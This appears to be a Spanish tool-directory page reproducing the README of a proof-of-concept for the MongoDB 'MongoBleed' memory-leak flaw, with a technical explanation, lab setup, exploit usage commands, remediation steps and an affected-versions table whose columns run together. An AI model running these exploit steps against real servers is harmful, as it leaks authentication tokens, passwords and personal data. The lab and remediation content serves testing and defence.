Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14847-MongoBleed-Exploit — CVE-2025-14847 MongoBleed - PoC de vulnerabilidad de fuga de memoria en MongoDB | Kitploit
Herramientas/GitHubGitHub/furkankayapinar/cve-2025-14847-mongobleed-exploit
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónSeguridad de Bases de DatosLabs y Práctica
GitHubfurkankayapinar/cve-2025-14847-mongobleed-exploit

CVE-2025-14847-MongoBleed-Exploit

CVE-2025-14847 MongoBleed - PoC de vulnerabilidad de fuga de memoria en MongoDB

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 7 mesesAún no revisado

CVE-2025-14847 - MongoBleed

Python License CVE

👨‍💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)

⚠️ SOLO CON FINES EDUCATIVOS

Entorno de laboratorio y script de explotación para la vulnerabilidad crítica de fuga de memoria no autenticada en MongoDB Server.


📋 Tabla de Contenidos

  • Resumen de la Vulnerabilidad

  • Versiones Afectadas

  • Instalación

  • Entorno de Laboratorio

  • Uso

  • Remediación

  • Aviso Legal


🔴 Resumen de la Vulnerabilidad

CVE-2025-14847 (MongoBleed) es una vulnerabilidad crítica de fuga de memoria no autenticada en el manejo de compresión zlib de MongoDB Server.

Detalles Técnicos

La vulnerabilidad existe en message_compressor_zlib.cpp. Al procesar mensajes OP_COMPRESSED:

  1. El atacante envía un mensaje manipulado con campos de longitud inconsistentes
  2. El servidor asigna un búfer basado en el uncompressedSize declarado
  3. Los datos realmente descomprimidos son más pequeños que lo declarado
  4. El servidor devuelve la longitud del búfer asignado en lugar de la longitud real de los datos
  5. Se filtra memoria del montón no inicializada al atacante

Impacto

Los datos filtrados pueden incluir:

  • 🔑 Tokens de autenticación y secretos
  • 🗄️ Datos de sesión de bases de datos
  • 👤 PII (Información Personalmente Identificable)
  • 🔐 Claves API y contraseñas
  • ⚙️ Detalles de configuración

📦 Versiones Afectadas


🚀 Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB

# Create virtual environment
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
# venv\Scripts\activate   # Windows

# Install dependencies
pip install -r requirements.txt

🧪 Entorno de Laboratorio

Inicie una instancia vulnerable de MongoDB para realizar pruebas:

root@kitploit:~
cd lab

# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d

# Verify it's running
docker-compose ps

# Load sample data (optional)
./setup.sh load-data

# Stop lab
docker-compose down

💀 Uso

Explotación Básica

root@kitploit:~
# Single target
python exploit/mongobleed.py -u 127.0.0.1

# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017

# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin

# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20

# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q

# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text

🔧 Remediación

Opción 1: Actualizar (Recomendado)

root@kitploit:~
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27

Opción 2: Deshabilitar la Compresión zlib

root@kitploit:~
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd

# Or in mongod.conf
net:
  compression:
    compressors: snappy,zstd

Verificar la Corrección

root@kitploit:~
python remediation/verify_fix.py --target 127.0.0.1 --port 27017

⚖️ Aviso Legal

🚨 ADVERTENCIA

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

  • El acceso no autorizado a sistemas informáticos es ilegal
  • Usted es el único responsable de sus acciones
  • Los autores no asumen ninguna responsabilidad por el mal uso

Al utilizar esta herramienta, usted acepta que tiene la autorización adecuada para probar los sistemas objetivo.


📚 Referencias

  • NVD - CVE-2025-14847
  • MongoDB Security Advisory
  • Varonis - MongoBleed Analysis

🤝 Contribuciones

¡Las contribuciones son bienvenidas! Por favor, lea CONTRIBUTING.md primero.


📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE.

Descargar herramienta
AtributoValor
ID CVECVE-2025-14847
Puntuación CVSS8.7 (Alta)
Vector de AtaqueRed
AutenticaciónNo Requerida
Fecha de Divulgación19 de diciembre de 2025
Rango de VersionesVersión Parcheada
8.2.0 - 8.2.28.2.3
8.0.0 - 8.0.168.0.17
7.0.0 - 7.0.267.0.28
6.0.0 - 6.0.266.0.27
5.0.0 - 5.0.315.0.32
4.4.0 - 4.4.294.4.30
Todas las 4.2, 4.0, 3.6Fin de vida útil - Actualice inmediatamente